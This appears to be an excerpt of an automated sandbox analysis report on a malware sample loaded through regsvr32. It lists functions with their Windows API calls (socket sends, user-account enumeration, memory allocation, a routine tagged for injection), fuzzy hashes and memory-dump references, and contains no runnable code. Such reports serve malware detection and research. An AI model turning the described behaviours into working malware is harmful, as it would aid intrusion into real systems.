                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ArgvCommandFreeLineLocalwcslen
                                                                  • String ID:
                                                                  • API String ID: 4161585929-0
                                                                  • Opcode ID: c61d42e80c05fda039f3c20d0b50298871c62309751adbdba232ee2b6d28516e
                                                                  • Instruction ID: 46a48db74050eca6f890aca1f7afc72ba3181068fff97dbac427818f25183438
                                                                  • Opcode Fuzzy Hash: c61d42e80c05fda039f3c20d0b50298871c62309751adbdba232ee2b6d28516e
                                                                  • Instruction Fuzzy Hash: DA2171B1C0161D9BDB20CFA4DA44AEFB7B8FF55308F104919D915B7640E735A945CBA0
                                                                  Function 02633240 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • send.WS2_32(?,?,00040000,00000000), ref: 02633271
                                                                  • send.WS2_32(?,?,?,00000000), ref: 026332AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: send
                                                                  • String ID:
                                                                  • API String ID: 2809346765-0
                                                                  • Opcode ID: b87a2e07e6ce37c19c25eb4d7218912955712a23445202ac4b844ff47e4b6c5a
                                                                  • Instruction ID: 05bf8d28bb5d048b224ca57824dadaafd1178e0253df1081237268cdce05172a
                                                                  • Opcode Fuzzy Hash: b87a2e07e6ce37c19c25eb4d7218912955712a23445202ac4b844ff47e4b6c5a
                                                                  • Instruction Fuzzy Hash: B311CE72B05344ABC721CA2EDCC8B5EB799FF81368F1041A5EA0DDB390D3B0D8619694
                                                                  Function 026330C0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: SleepTimetime
                                                                  • String ID:
                                                                  • API String ID: 346578373-0
                                                                  • Opcode ID: e20e5637971db6e233bbb313548ebfb89281e3181e49c211c0da8766e83b41b2
                                                                  • Instruction ID: ca2aac08a3dd66510b7223596d163235e7ab3f510df41125cd740397fcc56c08
                                                                  • Opcode Fuzzy Hash: e20e5637971db6e233bbb313548ebfb89281e3181e49c211c0da8766e83b41b2
                                                                  • Instruction Fuzzy Hash: CE01F731600605AFD711CF29D8C8BADB3B5FB5A305F544268D10087380C775A9E5C7D1
                                                                  Function 026365D0 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapCreate.KERNEL32(00000004,00000000,00000000,026361A0,00000000,02635B02), ref: 026365EB
                                                                  • _free.LIBCMT ref: 02636626
                                                                    • Part of subcall function 02631280: __CxxThrowException@8.LIBCMT ref: 02631290
                                                                    • Part of subcall function 02631280: RtlDeleteCriticalSection.NTDLL(00000000), ref: 026312A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                  • String ID:
                                                                  • API String ID: 1116298128-0
                                                                  • Opcode ID: ba9de0f803039fb6546171f36f1ec25353882bec93c673ff973ea24862ab6e4e
                                                                  • Instruction ID: 7883b6fd2ccd3a3cbd71a09f7d760ae0f1a7ec3c5e57fe6e4d3dbfea638351f0
                                                                  • Opcode Fuzzy Hash: ba9de0f803039fb6546171f36f1ec25353882bec93c673ff973ea24862ab6e4e
                                                                  • Instruction Fuzzy Hash: A2017EF4A00B409FC3319F6A9844A47FAE8BF99710B104A1ED2DAC6B10D371A445CF55
                                                                  Function 6C8F8220 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 6C8F82BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 79f67fbf581d26b5c856eb764b0b206047fb219a4083b4bd0f68701742ed756c
                                                                  • Instruction ID: 5c6c93072bd1444da7bd766bbad36a3994232ac2c1e8faad0b26c0b404bcd52c
                                                                  • Opcode Fuzzy Hash: 79f67fbf581d26b5c856eb764b0b206047fb219a4083b4bd0f68701742ed756c
                                                                  • Instruction Fuzzy Hash: 30213AB5D0120A9BCB10CF99DD809EEBBB4BF49314F14051AE824B7741E374AD41CBA0
                                                                  Function 04FA116C Relevance: 1.6, APIs: 1, Instructions: 325memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04FA11E6
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 2923ffbbd088fcb14a2ba6a0f44f74b26ffba7a218e7267c1327e4f48e88d229
                                                                  • Instruction ID: 0c3a05b9bad52dabde4172f876a87a631dca8c641fc6648de85760e0450dbf21
                                                                  • Opcode Fuzzy Hash: 2923ffbbd088fcb14a2ba6a0f44f74b26ffba7a218e7267c1327e4f48e88d229
                                                                  • Instruction Fuzzy Hash: 89B1F7B5A00702EFDB319E64CD80BA7B7E8FF06314F160529E98986150E731F576CB61
                                                                  Function 6C8F9AA0 Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetThreadStackGuarantee.KERNEL32(00005000), ref: 6C8F9AB5
                                                                    • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: FreeGuaranteeHeapStackThread
                                                                  • String ID:
                                                                  • API String ID: 4181682901-0
                                                                  • Opcode ID: c1882879d45e5721ff1258e65a375cd6ff3463ac5965b4434c0236355a4321b4
                                                                  • Instruction ID: 7d1ecd1afbe8cd9b510bef9932b866afd62b03da0fbe0147031433289a3b5cf5
                                                                  • Opcode Fuzzy Hash: c1882879d45e5721ff1258e65a375cd6ff3463ac5965b4434c0236355a4321b4
                                                                  • Instruction Fuzzy Hash: ADF059B66001006BDB20EE94DC80EEB77ACEB44A24F044430FA089B301D779E915C7F1
                                                                  Function 02644276 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSAStartup.WS2_32(00000202), ref: 0264429E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Startup
                                                                  • String ID:
                                                                  • API String ID: 724789610-0
                                                                  • Opcode ID: 25efe680c2c25d63650b4f79be30d06df1b16f3e3af0767d0a93a9cef7fa2fa7
                                                                  • Instruction ID: d84f60fdcabe7b50108e628c0899a89c8d974a4476e81b6129876b40680afad8
                                                                  • Opcode Fuzzy Hash: 25efe680c2c25d63650b4f79be30d06df1b16f3e3af0767d0a93a9cef7fa2fa7
                                                                  • Instruction Fuzzy Hash: 9FE0D874E4020CABD709EFA5E90768E77E6DB09710F40046DFA4687240DE716A288B95
                                                                  Function 6C8D2A90 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C8D2AB0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: InfoSystem
                                                                  • String ID:
                                                                  • API String ID: 31276548-0
                                                                  • Opcode ID: bb3ace0487df3395af6e142a50a24a2429191e2a758ef5998244877c02b75c0e
                                                                  • Instruction ID: 750695ebe2060543845e0666f87e80b0997452a19585fe25b5ff8181bdb9efd0
                                                                  • Opcode Fuzzy Hash: bb3ace0487df3395af6e142a50a24a2429191e2a758ef5998244877c02b75c0e
                                                                  • Instruction Fuzzy Hash: 8BF05E70E083498BDF20DF68C5806DABBF4EF1A214F25D529E888A7740F730A9D0C790
                                                                  Function 02644280 Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSAStartup.WS2_32(00000202), ref: 0264429E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Startup
                                                                  • String ID:
                                                                  • API String ID: 724789610-0
                                                                  • Opcode ID: 0429ca9435e17d53173b72cadac39724404bbaf536fd5cfdb57285a3ec162203
                                                                  • Instruction ID: 8599884b29642a7c660b2197ea9699e1dff8fa14854332b23c92cfbf714da880
                                                                  • Opcode Fuzzy Hash: 0429ca9435e17d53173b72cadac39724404bbaf536fd5cfdb57285a3ec162203
                                                                  • Instruction Fuzzy Hash: 1EE02674E4020CABD705EFA5E90764EB7F9DB09310F40046DF94687240DEB06A248B9A
                                                                  Function 6C8521F0 Relevance: 1.4, APIs: 1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memcmp.MSVCRT(?,?), ref: 6C8523BB
                                                                    • Part of subcall function 6C9328C0: memcmp.MSVCRT(00000001,00000001,?), ref: 6C932A6F
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcmp
                                                                  • String ID:
                                                                  • API String ID: 1475443563-0
                                                                  • Opcode ID: ce8937f02912817341e87c3ba404371270e2430e42243c8ee3c5e03d1de17ca1
                                                                  • Instruction ID: 8f6c4958f4abc1e73a8a9cec9028b1fc83092e7930523d1ab0ca0ac3a101b283
                                                                  • Opcode Fuzzy Hash: ce8937f02912817341e87c3ba404371270e2430e42243c8ee3c5e03d1de17ca1
                                                                  • Instruction Fuzzy Hash: 6E41B0B3D193201AD371852489447AFBBA59BC2378F8C4F2DF8D403681DAF9D85087D2
                                                                  Function 6C874040 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: f056032065a7cb2b143405f6329892ec2db737aabf561845cb83b8acead691b4
                                                                  • Instruction ID: 5fdfd4a647461b66a7ea26e207d86ae5d8bfdbe936465d2c2e1ef6ae15dfb2ff
                                                                  • Opcode Fuzzy Hash: f056032065a7cb2b143405f6329892ec2db737aabf561845cb83b8acead691b4
                                                                  • Instruction Fuzzy Hash: 21314B31B042064BDB3CCA6C8D657BEB672ABC5314F144A3DD5169BBD0F77195048BA1
                                                                  Function 6C85AC40 Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: cf9517879a36872fc609b8e078a89f4a755ac12bcf3262c5f263ea79d3dd647f
                                                                  • Instruction ID: afe298288e486bd80390dc4d68a12d184d21713b3c52fb3fb7291ebfd66e04a3
                                                                  • Opcode Fuzzy Hash: cf9517879a36872fc609b8e078a89f4a755ac12bcf3262c5f263ea79d3dd647f
                                                                  • Instruction Fuzzy Hash: 35D06734248349AFD710DE58C984A5AF7E9BB59714F108814F95887A50C770FE94DB45
                                                                  Function 6C8FAFB0 Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(027D0000,?,?,?,6C8E9F6C), ref: 6C8FAFC5
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 4292702814-0
                                                                  • Opcode ID: 67cc9dbce748397726262a98fe01b0d78b7edcf3bde6fcbfb087cd048a6a3fe9
                                                                  • Instruction ID: 9a88eec1d9c88d201bb2e05f10adf0f6eb805250e36fbf22c161ea3dbf89ad47
                                                                  • Opcode Fuzzy Hash: 67cc9dbce748397726262a98fe01b0d78b7edcf3bde6fcbfb087cd048a6a3fe9
                                                                  • Instruction Fuzzy Hash: 03D012B02043496BAF149E75DC44CB7336CEB9496C7208914F82C8BB44DB30F9558574

                                                                  Non-executed Functions

                                                                  Function 6C944A90 Relevance: 31.9, APIs: 21, Instructions: 445stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: strlen
                                                                  • String ID:
                                                                  • API String ID: 39653677-0
                                                                  • Opcode ID: 22b11ded44ba08c8d9a396ebef7d7ae0f47604ff01838866b54777b4a2b22bde
                                                                  • Instruction ID: 2d91dd238d420f2a8f7fa2e7005c4734e6cb0422047ddb77e0409acb40ce4177
                                                                  • Opcode Fuzzy Hash: 22b11ded44ba08c8d9a396ebef7d7ae0f47604ff01838866b54777b4a2b22bde
                                                                  • Instruction Fuzzy Hash: B702E2725087518FD710CF29C044796BBE2AF86318F09C6AED8A84BB91C376E949CF81
                                                                  Function 6C86D3A0 Relevance: 24.2, APIs: 11, Strings: 2, Instructions: 1408COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetIfTable2.IPHLPAPI(00000000), ref: 6C86D3C2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Table2
                                                                  • String ID: $$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs
                                                                  • API String ID: 2184214033-2784426548
                                                                  • Opcode ID: 2ed534b59337a70987788e7a9b6ba573cf82a0c9b84f3f500eb74d3c707a7839
                                                                  • Instruction ID: 60839a1fb1a04251cbd0e6f6a6da86ad92a2d3aa0756b53c72f0f5619bf0f3a5
                                                                  • Opcode Fuzzy Hash: 2ed534b59337a70987788e7a9b6ba573cf82a0c9b84f3f500eb74d3c707a7839
                                                                  • Instruction Fuzzy Hash: 4CD2A1759087418FD721CF29C980B9AF7E1BFD9304F148A2EE89897751E770E944CB92
                                                                  Function 6C870400 Relevance: 23.0, APIs: 15, Instructions: 503COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,00000000), ref: 6C8704C6
                                                                  • NetUserGetInfo.NETAPI32(00000000,?,00000017,00000000,00000000,00000000,00000002,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000002), ref: 6C870522
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: User$EnumInfo
                                                                  • String ID:
                                                                  • API String ID: 2388768862-0
                                                                  • Opcode ID: 268f8394c78054a691848e5af2bf80472125b1f25001ff6e098ce8ae99b8adde
                                                                  • Instruction ID: 61ce1feaf7318e5c3e6ab5f184242dace51ec477b7b8ea17fd33778a45690b9d
                                                                  • Opcode Fuzzy Hash: 268f8394c78054a691848e5af2bf80472125b1f25001ff6e098ce8ae99b8adde
                                                                  • Instruction Fuzzy Hash: 70125C71D006599BDB20CFA8C984BDEBBB4BF59318F144529E818FB741EB369944CBA0
                                                                  Function 02635830 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 135threadinjectionprocessCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 02635859
                                                                  • _memset.LIBCMT ref: 02635878
                                                                  • _memset.LIBCMT ref: 026358AD
                                                                  • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 026358C1
                                                                    • Part of subcall function 026359F0: _vswprintf_s.LIBCMT ref: 02635A01
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 026358F0
